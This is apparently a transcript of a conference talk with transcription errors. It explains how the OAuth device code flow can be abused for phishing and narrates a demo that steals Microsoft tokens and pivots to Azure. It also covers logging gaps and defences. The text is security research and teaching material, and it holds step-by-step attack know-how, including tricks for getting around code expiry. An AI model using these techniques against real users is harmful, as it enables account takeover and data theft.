 Hi, welcome. Today, I'm going to be talking about new fishing attacks that exploit OAuth authorization flows. My name's Janko Wong. I'm currently a researcher at Netscope. There are some of the areas that I've dabbled in and are interesting to me from a research perspective. So to recap some of the past about fishing, I'd like to just spend a minute talking about that so that we can understand some of the latest evolution of techniques. So in the beginning, certainly, fishing was predominantly carried over SMTP. This is probably late 90s when we started to see fishing. Tacker is very focused on fake domains, creating them, hosting websites, maybe creating SSL as well to lend some validity to their fake site, and ultimately tricking the user into supplying their username and password. As mobile came along, more apps, app protocols came fishing, then targeted those applications. So we got SMS fishes, smashes, IAMs, chats, for the most part a lot was the same, but because of the limited UX and real estate, certain things like URL shortners, being able to detect the SSL or even see the URL were different or challenges affecting the user as well as any software security controls in the picture. With cloud infrastructure providers, suddenly the attackers had an easier way to host their actual fake website. On top of that, the domains now and the SSL certs reflected those same popular cloud providers. So the victims as well as the security controls had more of a challenge in detecting fake domains, fishes, certs, et cetera. So none of this is new, and in this case, maybe the attackers trying to create something like Citibank's website hosted in Azure. The controls I alluded to and for the most part grew into a series of techniques up front, detection of fishes using various link analysis, domains, URLs, the certs themselves, checking on the sender reputation, having thread and tell that helps with that so that the fish on an incoming basis could be blocked before reaching the user. Post user receiving an actual fish, some of the same techniques might be used to prevent the user from actually connecting on an HTTP request outbound to the fake website. There might be additional content inspection. Excuse me, content inspection used to detect credentials within the payload as well, form, fields, et cetera. Ultimately, if credentials were hijacked, a set of controls like MFA and policies governing IP addresses that could be used with credentials also were applied. MFA especially was pretty effective at minimizing the impact of compromised credentials. So none of this is new. This has been sort of 10 or 20 years of fishing evolution. If I could simplify it at that. Now, what's changed with some of the last few years? Well, as OAuth, which was introduced in 2013 as OAuth got more popular and driven a lot by security and the interaction of all these websites and web apps, that part of OAuth that dealt with authorization in a secure manner became very popular and sort of has caused us to rethink both how to fish and how to defend against it. And OAuth at a high level, if you're not that familiar, involves the application. This could be the website or it could be a local application on the desktop or mobile, often referred to as the client or device. The application might request authorization from the user to do something and that could be approve, pay a payment, log in, so on. And it directs the user to identity platform, right? Part of OAuth model is to not have applications handled, no, store anything about the user credential. So in this case there's a redirect. The user then authenticates as they would with their identity platform and when we're talking about OAuth it's really Azure AD or Google identity. That authentication process could be very secure and have MFA. Ultimately the user is presented with some kind of authorization step, approve these permissions, approve this task. The permissions are called scopes in OAuth land. And if everything goes well, session tokens, OAuth session tokens are supplied back to the application. The application has these access tokens and can generate new ones with the refresh token and can use it to actually gain access to the resources of the user or to perform a task because they essentially have post authentication status. So as a user this is familiar in various contexts. One is payments, you're shopping, you get to checkout and PayPal which is an OAuth provider. Allows you websites to easily pay with PayPal. Websites, if you click through as a user, redirect the user to PayPal so that you can go through your authentication with MFA. And right now we're dealing with PayPal as a user so the original website does not see or have a chance to compromise your credentials. And as you complete the process with PayPal you end up on the right with their version of an authorization or consent stream which is do you agree to pay that original website such and such money or whatever you are shopping for. There are other contexts, even technical tools like CLIs and Google Cloud have a login process of course. In this case it creates a URL that you can copy and paste into a browser but it's actually an OAuth flow and in the browser once you go to that URL you're prompted to enter your username and password and then you get to a consent screen saying hey the CLI which is really registered as the Google Cloud SDK. Once access your Google account and it's asking for these permissions. If you go ahead and hit allow you just confirmed and you see some confirmation messages and back on the command line you might see a final message that hey you're now logged in. So initially phishing responded to this new authorization identity platform called OAuth with similar techniques just here's a new login. You know great we have an OAuth login but it's just another login I'll spoof it. So a lot of this was business as usual from the phishing side. However we did see some evolution where the code presenting that actual fake login would actually do a real-time validation check against the identity provider to validate that credential and then based on whether it was valid or not it might take different actions that would help maintain stealth it might redirect to a valid domain login screen or something else depending and that might help you prevent the user from maybe raising a flag manually. Also provide an opportunity to validate credentials up front so that you could do that check right away instead of later. The controls for the most part I would say have stayed the same because really the techniques have not changed much. So why do we care to maybe delve and research into the protocol deeper, right? So far this hasn't made much difference. Well obviously I wouldn't be talking if that were the case. Here's why attackers have dealt deeper and why from a research perspective it's worth us focusing on this. One is instead of targeting the username and password we target the OAuth session tokens. There are some advantages there. The model of OAuth essentially allows a refresh of them and the defaults pretty much allow you to do that forever. The session token gives you the same power as the original credential. It has one advantage which is you don't have to re-challenge with MFA. If MFA is enabled, once they go through that manually the tokens effectively are blessed and the refresh token just allows this unlimited ability to have a long duration credential. So getting access to session tokens effectively allows us to quote bypass MFA. The second reason is that all of this is rest enabled so hijacking the actual tokens does not require compromise of an endpoint. We have these nice rest APIs, we have a complicated flow there's the ability to insert us into the flow or perhaps gain access to tokens remotely which is huge because tokens are not a new concept they've been around since the beginning of the web. We've had web sessions and we've had session IDs kept in cookies or local storage and we've had web attacks, SSRF that exploited those sessions to hijack them. We've had endpoint compromises that have also looked at grabbing or harvesting those tokens. However, there's a pretty high bar to take advantage of that because you would have to compromise that endpoint or do a browser attack. This is far easier, far easier because we have rest APIs and we'll see that in the upcoming deep dives. So there have been actual attacks. So one of them is called illicit consent grants attacks that have exploited the protocol. Sorry, I didn't quite finish that. So in illicit consent grants it's exploiting wider consensor privileges and tricking the user to approve them. So this works with attacker creating their own application, a fake application perhaps named close to an existing app. They register it in the identity platform, it could be their own account. They send out ultimately a fish to the user, requesting broad scopes to some resource. So imagine it could be Google Drive MySync, some name that seems plausible. I ask the user to give this application access, read and write to everything in Google Drive. And get the user to click, they'll approve these bigger scopes and a lot of tokens will be created and will be accessible by the user because the user that's part of the flow is specifying how to retrieve those tokens and they get actually pushed through a redirect URL to the application. So from a user perspective, a victim perspective, the chance you either have to identify or know that it's a fake application or an administrator security or IT administrator needs to be able to prevent users from clicking and approving these apps, app requests. So this happened and there's a reference here just in the last year or so of illicit consent grant attacks. From a user perspective, they just see in the consent screen a list of permissions that might be wider or deeper than they expect and the controls against these are, as I mentioned, the administrators running the organization, watching the network, having the ability to prevent users from creating or registering fake apps in AD which might prevent an insider attack and they can prevent users from consenting and hitting accept. It changes this flow and they're not actually presented with an accepted button. The administrator's in control. I just wanted to point out that the Microsoft documentation has this nice 12-point numbered system. I did not add that, that's actually part of the documentation and they're explained pretty well within the documentation. Kudos to them. It's great as a researcher and I have to say as a user, it's extremely confusing to have 12 points to explain an OK dialogue. So this is where complexity is the enemy of security. So let's get to device code authorization, which is really the flow I want to focus on today. What's the purpose? Briefly, to provide usability that is easier authentication and authorization on a limited input device where you need some kind of authorization and authentication. Best examples of smart TV where you need to authenticate against your content subscription so you can get your movies on the TV. They'll have this menu these days. It could be something, some device like a Roku or Apple TV. But the problem is, if you were to enter that credential on the actual device, you'd be faced with something like remote control, completely heinous. So there's an RFC to solve that. Back in 2019, some smart people came up with a way to do that. And when it's implemented, the application vendor, in this case the smart TV vendor, implements the device code flow. And now the user has a better, a better flow. They're presented with a short URL. They're told to go to a different device that has a real keyboard or something that they can do. There's a relatively short URL to punch in there and a relatively short code to type in there. And then you will go through a normal authentication or login process to prove this TV gaining access to, in this case, your Netflix subscription. They even have a QR code capability so that your mobile device can even go to the URL directly. So that's all well and good. But the user gets when they follow URL or something like this, punching that short code, voila, everything's working. However, usability is one of the biggest drivers here. And I have a saying that unusability is the father of insecurity. It drives less security, and that is our opportunity to exploit. Because things get simplified, things get dropped, things get less secure, or things just aren't looked at from a security viewpoint. So let's look at device code authorization a little bit deeper. So what really happens under the hood is a user is trying to log in or do some task. The device gets some user codes and sends a URL with that user code to the user so that they can authenticate. And once they do, OAuth tokens are created, which are then accessible from the device. So, okay, similar to what I said before. But to show how easy it is to use that, or at least how difficult it is as a user to protect your credentials, I'd like to go through the demo now. Just a short note, Dr. Sinema has a great deal of information at his blog, the 365 blog, super great resource. He has his tool set, AAD Internals, great stuff about Windows AAD Outlook Office, as well as OAuth in there. I highly recommend that. So let's jump into the demonstration. So to lay the stage here, on the left side will be the browser of the victim, on the right side will be the terminal of the attacker. And we'll actually go through a device code flow and sort of see the implications from both sides. So in this case, we're logging into the standard URL for this company that AAD is part of, Feast Health, and we want to gain access first to Outlook. So we punch in name, password, get to, two factor. In this case, it's software based. We punch in that code. Do you want to stay signed in? No. We'll go through it and boom, we're in Outlook. Now, meanwhile, the attacker independently is thinking of phishing. We'll start up a script. So running in demo mode. This is part of the open source software we are releasing concurrently. I want to point out a few things. One of the first steps that we're doing as part of the phishing is actually following the device code authorization flow. We're going to generate a code. If you look at the post, we're specifying a set of APIs, the graph APIs as our resource. And we're actually using a client ID. This is the application client ID. When you create an application, the OAuth world, you get back an ID and a secret. We're actually reusing one. We didn't have to create an app to carry out this phish. This is the Outlook ID that we're reusing. When we execute this first step, we get back a user code that we're going to phish the user with, along with the login URL. It's called the verification URL. We'll explain the other fields as we go. Now I'm going to send out the phish. And in a second, the phish will appear. I'm going to pause and just say that after the phish is sent out, part of the device code authorization flow is to pull the identity platform, this case Azure, for OAuth tokens, which will be created after the user logs in. So it will sit there waiting. And in a second, there it is. On the left, we see a new email. Let's check it out. Ed has received an email from the Microsoft Office 365 product team. It is thanking Ed for being such a great customer. As part of that, he'll get one terabyte extra storage and increase file size, attachment file size of 100 megabytes. It's awesome. Ed can't resist and he types in the code. Now, let me go back and point out in the message. There's a real URL in here. It's Microsoft.com, nothing shady or funny. That is, it's an ATRF link, but it's actually pointing to the text. It's part of the device code authorization. So we can see that some fish detection might fail right off here on domain alone because it was Microsoft.com. Okay. So let's go back as Ed follows that, punches in the supplied code in the fish and what's happening. He is being prompted to authenticate. Okay. Since he had already logged into Outlook, it is cached in the browser. Otherwise, who type in his username and password and perhaps MFA code. And then get to this stage. I want to point out, here's the prompt. Are you trying to sign into Microsoft Office? Microsoft Office came from the use of the client ID in our fishing step initially. Okay. We use the client ID and we get the title. All right. So there's continue and that's it for the user. They enter the code, they authenticated, they're done. Meanwhile, we are polling. The attacker script is polling. Checking every five seconds. This is all part of the protocol for device code authorization. Now that the user is logged in, we should have OAuth tokens and this will return in a few seconds with access tokens, session tokens. There it is. So let's note a few things. Okay. Number one, what's in the response is scopes associated with the tokens. These are the permissions that we can, that we have access to with this token. The resource that tokens apply to is the graph API. We have an access token. We have a refresh token. Okay. Great. What can we do in the graph API? Okay. You can see the indirection here. We put an application Microsoft Office. That's what the user thinks they've approved. We've got access to the graph API, which is a little bit broader than just outlook. So one thing we can do is get all AD users with that access token running as ad or with his permissions. And there's a list of three users, ad included, David and Sandra. We will go to, just to compare, we'll go to ads view the victim in Azure portal. We will actually go to Azure Active Directory and check out the users just to convince ourselves this is real data matching, right? All matches. What else can we do? We can gain access to ads email. So we just did a call with that same access token and got three emails. Thank you from 365 team. Some social security credit card numbers. All looks great. Switch to outlook as ad. And you can see in the inbox, naf pain on the left, the same emails. So this is great. For the graph API, we have access to email sum of ad. But to make it interesting, we want to show that you can actually pivot, move laterally and trade in, or rather use the refresh token we have to gain a different access token with different scopes, different implicit scopes. So let's do one that allows us to get more at all of Azure. More of all of Azure resources. So what do we do here? We use the refresh token that we got under the guys of Microsoft Office against the graph API and we use that refresh token to get a new access token that has access to the resources in Azure. We are still using the outlook client ID and the scope, we have to specify scope. Before we didn't, we got a bunch of scope permissions. Here we're using open ID, which is a pretty basic scope. So the username, email, basic profile information. Okay, and what we got back is interesting. We will press the resource or Azure and that's fine. Look at the scope. It changed which is part of the protocol. It comes back with what you really have access to. We asked for open ID. We got back user impersonation. User impersonation means we can do everything the user can within this resource area of Azure. That happens to be a global administrator. We have hit gold. Okay, we got a new access token. This access token has the scope privilege for this resource. So, and we didn't really have to supply anything special. I want to point out no secrets. So what can we do with that? Let's enumerate all resources in Azure. At least in the subscription that is part of. Okay, long list. Let's go back to the beginning. Let's take a look at this. First, we listed the subscription that this user has access to. Yeah, this token. Just to convince ourselves we're in Ed's view in the portal. Let's look at subscriptions. It is in fact Azure subscription one crate. A bunch of resources in that subscription. So let's look at all resources and compare it with what we retrieved just to convince ourselves we're looking at real data and disks and computes. Virtual machines that are SSH keys. There's a storage account for data. S A J E H one is listed there right there. And on that is a container that storage account has a container S J S C J E H one drilling into that container. Our two files SS one and three dot txt. And in fact, there is the container and there is SS one SS three. So everything matches up and we've just enumerated everything. And since Ed's a global administrator, we could we could do anything pretty much within the whole ad as well as the subscription. So that's the end of the fish and the super interesting part from this view is the pivot as well as that we had to supply. We did not need to supply any secrets along the way. It was really easy. Let's switch back and look at device code authorization in a little bit more detail going back to the protocol itself. And let's figure out how we abused and carried out that demo. So let me highlight a few things. When we turn this into a fish. Pretty much use the standard device code authorization, but of course there is no initial login or task by the user. Normally with the smart TV example, the users explicitly trying to hook up a streaming service and authenticate to it. So the user is expecting to be part of this flow. Here the tackers and control user is sitting minding own business. We will as an attacker start with generating some user codes. And I want to point out this is real snippet of all the key attributes in the REST API call to generate a code and get the standard URL. I supply client ID which we've seen can be spoofed or rather be an existing client ID including the vendors in this case it's Outlook. I don't need to supply a secret here and I can specify a resource whether it's Graph API or Outlook.com. And I immediately get back the information I need to start my fish. Device code which I'll use later. User code which I'll give to the user login device expiration time. I give that to the user and my fish, the user. If they're convinced this is the key step in the number four, but if they're convinced they go and authenticate, enter the code, go through authentication including MFA. And once they're done what's happened is the device is in the background polling and checking the identity platform which will let it know once the user is finished logging in successfully in which case a lot of tokens will be created and returned as part of this polling API call. Look at all of the stuff that the application or the device has done. No secrets required. All public information in fact client IDs are most part easily determined for local clients and they're also logged so it's actually really using the Microsoft area to identify client IDs. No secrets are needed. So you can see that this is a little disturbing because if you squint and step back and ignore the text we now have a process where I just need to convince the user to type in a code in a standard Microsoft or Google URL. If I do that then just to note I do know that I've mixed and matched Google URLs with Microsoft ones. In all cases this is very real and often common. All of these attributes are similar across both and what I was saying is that to carry out this fish if you step back from it all all you need to do is convince the user to go to a particular URL enter in a code authenticate. The cloth tokens will be created stored by the identity platform and you can go and retrieve them. That's a little bit crazy, right? You don't have to create your own infrastructure to do that. Your own login page, your own application. You just had to point the user to the identity platform and give them a code and then you have your tokens. Once you have the access tokens, the pivot from a Microsoft perspective does look like this. You supply, you make a refresh token call and you get back a fresh set and here's where you can see the scope changes. We pointed this out during the demo and this is just repeated just to show that. So to summarize some of the key points, what's not just with Microsoft but common across all Auth vendors is a device code authorization that has three aspects or qualities. You don't need server infrastructure. You don't need to register your own OAuth application. In fact, you can use an existing one, even the vendor's client application. The user does not see a consent screen, does not see a list of permissions. You're not prompted for that. They are prompted with this somewhat obscured. You want to sign into the application but that's it. You want to grant the application access to everything in your email, all users in AD and your Azure as well as other services. They don't see that. Microsoft has a sense of implicit or default scopes. That is in step two, the application when it starts this whole process never supplies scope. Google is a bit different if you do supply a scope. It just means that the scopes you get ultimately with OAuth tokens are things you never had to request. And we end up getting user impersonation scopes in Microsoft which allows us to do anything that the user can do. Microsoft allows this lateral move to other services or resources, I should say, as that user by being able to refresh a token for a different resource and get that back. Logging is limited and what is logged is when the attacker actually retrieves the OAuth token, their IP address is logged and it shows as an actual authentication or sign-in logs of Azure for this user. But this is limited because the lateral move is not logged. The lateral move being when we refreshed the token to get an Azure access token that was not logged. So, partial information. Here are some of the details in that line item or entry. We can see that the application information ID is shown but not much else. We know what user is operating here. The attacker did this retrieval of OAuth tokens for ed but this just looks like an ed action. Nothing identifies that attacker other than the IP address or the prior view which can easily be obfuscated through a proxy or VPN. So, what can reasonably be done to protect against this or what would be encountered? Probably the most effective one would be blocking of verification URLs, that is the sign-in URLs that start this whole process off with the user. There are some standard ones for Google, Microsoft has two because the second one redirects to the third. So, you could block those URIs, the security team could. But it's an imperfect solution because you actually might need to allow it for some valid logins. What's an example of that? Not a smart TV that could probably be against all policy but it could be Azure's CLI does device code authorization. At least has one flow where it does verbatim device code authorization. So, you have to be careful what is broken if you're on the defensive side and it just means that there's opportunities where the prevention may be imperfect or can't be put in place. There's some recommendation to use to block access or use of tokens based on IP or location or endpoint and if that's it within control that's a possibility. But IP allow lists often are a challenge as well as geolocation and other characteristics. So, prevention is best described as imperfect but possibility. Detection is difficult because the logging of anything related to OAuth tokens or temporary session tokens is very limited. Remediation does exist. Once you do know there's a problem with a user you can revoke all OAuth tokens in Microsoft's wall. In Google that is more obscure. You can do it but it's not as obvious as a straight API call. There are some practical considerations to keep in mind. The main one is that the user or device code one generated is temporary. It will expire typically after 15 or 30 minutes. It's in the response of the rest API call. It just means the attacker can either in response play a phishing numbers game that is ignored and just blast up to a large number of users at a certain time in order to get them to respond. If going over email, email would have its advantages and that the fish could be rich. It could sell a story. However, the timing may have a result in a low response to the fish. So, practically speaking though you could choose other forms of communication including chat SMS that might create a more instant response because of how those applications are actually used in everyday interactions. So, there's ways around this temporary time frame. You could also fall back and actually create some infrastructure, host your websites and then have your connection. Instead of supplying a code, instead points the user to a website, the fake hosted website to generate a code and get your discount code. So, discount codes exist in that model today and it's probably reasonable that someone would fall through that. You could even have images dynamically generated that show codes and images are suggested because that would be out over JavaScript in actual mail browsers. They might be blocked but the user always has an option to load images and that could dynamically at that point in time generate a code and would give a fresh 15 minutes for the user to do that. So, I point that out mainly because that is the one area from a practical implementation viewpoint would need to be accommodated. So, there are some comparisons between go off providers, in this case it took the two major ones, Microsoft and Google. The main difference is there's more exposure on the Microsoft side because the handling of scopes are implicit and default and you can get quite a lot of permissions without even asking for them whereas on Google they really timed up the scopes you get from device code authorization. Meaning the access tokens can access user profile have limited Google Drive access mainly to files that the app itself has created and some YouTube more profile info. So, because of that the lateral movement is very different. On the Microsoft side it was easy as we saw in the demo to switch between or among a large number of services as well as in Google. It's pretty limited and strict. You get what you get with the initial scope. But all in all this drives towards maybe mentioning some ongoing research areas. The problem with OAuth is not that it's got flaws or isn't secure. The problem is more that it's complicated. We talked about the normal OAuth flow, the payments examples and CLI login examples. We did a demo of how one other flow, the device code authorization flow can be easily exploited. There's three more flows which aren't quite as obvious as the device code authorization but in terms of having exposure but certainly are interesting areas to research because some of them have usability type requirements like implicit grants where things like consent can be bypassed because there's a way to get access tokens silently in the background. The default scopes that Microsoft has in their implementation is another area to delve further into just to see how those scopes are specified and returned because there may be areas to explore there. Consent is described, let me preface that with, there is a model for incremental consent so that an application can present one at a time permissions or ask the user one at a time for certain permissions as needed. But then it gets into dynamic user consent and some language that just hints that it's not as quite straightforward in terms of behavior as you might think and complexity breeds sort of opportunities for exploit. The last area is particularly interesting in that browsers today allow sort of usability features where you log into one application. Let's say you're in Chrome, you log into Gmail, then you suddenly open up a tab and put in that same browser, a URL for G Drive. You don't have to reauthenticate to G Drive even though that's a separate app, you're not even presented with a consent screen for either application. So already browsers today for usability provide this kind of auto log in and scope expansion, the sense of switching scopes that don't involve users explicitly entering credentials every time and re-approving scopes and permissions. What does that mean? It just means usability might have short cut some parts of the protocol because it is Oauth underneath. Back in 2013, it's not all hypothetical, there was some opportunity to mimic what happened with certain Chromium browsers or Chrome browsers basically where you could have a token traded in and get more of a super or uber token that could access a lot of information across apps without having to have gone through any reauthentication. Anyway, long story short, it's a very interesting area and beyond this list, the more important takeaway is that we have a complicated authorization protocol. We have differences in implementation as we've seen. Microsoft has a few quirks, Google has some different ones, results in different behavior. It's ubiquitous, it is as much a standard as anything on the internet. You can't avoid it, everyone's using it and it's distributed by nature over a large network with Rust APIs. So this is a particularly interesting area for us to keep an eye on in terms of security risks and opportunities. So thank you, that is the end of the talk. We didn't cover in detail but there are open source tools that you can use to run the demo as well as do self-fishing, as well as explore what permissions are available. Once you do get responses to fishes, finally there is a list of references which is in the initial presentation but repeated here as well. So thank you for your time and if there's time for questions, we'll take them now.